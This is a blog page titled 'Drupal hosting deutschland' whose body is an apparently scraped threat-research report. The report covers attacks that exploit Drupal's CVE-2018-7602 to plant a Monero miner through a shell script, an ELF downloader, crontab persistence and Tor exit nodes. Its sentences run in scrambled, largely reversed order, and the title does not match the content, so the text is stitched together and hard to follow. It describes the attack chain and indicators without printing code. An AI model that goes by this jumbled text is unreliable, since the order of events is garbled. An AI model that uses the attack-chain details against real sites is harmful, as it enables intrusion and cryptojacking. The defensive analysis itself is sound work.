AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
Drupal hosting deutschland4/28/2023 This is particularly true for enterprises whose web applications and sites - like those that use Drupal - manage sensitive data and transactions. Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth. Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address. The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead ( CVE-2017-5674), and a memory leak flaw in Apache ( CVE-2004-0113). The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). Given that it’s a Tor exit node, we are not certain if these attacks are related to the Monero-mining payload or are from a single threat actor. In fact, Trend Micro has blocked 810 attacks in the past month coming from this IP address. Additionally, we found that the IP address is a Tor exit node - gateways from where encrypted Tor traffic is passed to normal internet traffic. ![]() Based on WhoIs information, the IP segment 197231221024 appears to belong to a virtual private network (VPN) provider. We were able to follow the malware’s trail to 197231221211. The attacks are notable for the precautions they took in that they hide behind the Tor network. This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics.įigure 5: A part of XMRig included in the cryptocurrency-mining malwareįigure 6: The reversed pseudo codes of the Monero-miner's main() function Figure 6 shows this furtive behavior, which the attacker/operator added in their modified version of XMRig. ![]() When the miner starts to run, it changes its process name to and accesses the file /tmp/dvir.pid. ![]() It also checks if the machine is to be compromised or not. The Monero miner installed in the machine is the open-source XMRig (version 2.6.3). And given this seeming variance, we foresee this as a pattern in future attacks.įigure 4: The assembly codes of the SEND_DATA() function of the downloade r HTTP 1.0 traffic is quite uncommon in these kinds of attacks, as most of the HTTP traffic by many organizations is already in HTTP 1.1 or later. The target path for the POST method is /drupal/df.php. The downloader employs the HTTP 1.0 POST method to send data back in SEND_DATA() function. The ELF-based downloader also retrieves a Monero-mining malware (COINMINER_TOOLXMR.O-ELF64) and installs it on the affected machine.įigure 1: Code snippet showing how CVE-2018-7602 is exploitedįigure 2: Code snippet showing how the shell script is retrievedįigure 3: A crontab entry added by the malware to auto-update itself In this case, the command is to check the link from which it downloads and interprets a script named up.jpg posing as a JPEG file. ![]() As shown in Figure 3, the downloader will add a crontab entry (which, in Unix-based systems, contain commands to be executed) to automatically update itself. How does the exploit lead to the Monero miner?Īs shown in Figures 1 and 2, the attacks we’ve seen exploiting CVE-2018-7602 download a shell script, which will then retrieve an Executable and Linkable Format-based (ELF) downloader (detected by Trend Micro as ELF_DLOADR.DHG). According to a researcher's technical analysis, successfully exploiting the vulnerability entails elevating the permission to modify or delete the content of a Drupal-run site. Drupal’s security team also reported that CVE-2018-7602 is being actively exploited in the wild. The security flaw was discovered after Drupal’s security team looked into another vulnerability, CVE-2018-7600 (also known as Drupalgeddon 2, patched on March 28, 2018). While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.ĬVE-2018-7602 is a remote code execution (RCE) vulnerability affecting Drupal’s versions 7 and 8, which was patched on April 25, 2018. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. For now, these attacks aim to turn affected systems into Monero-mining bots. We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework.
0 Comments
Read More
Leave a Reply. |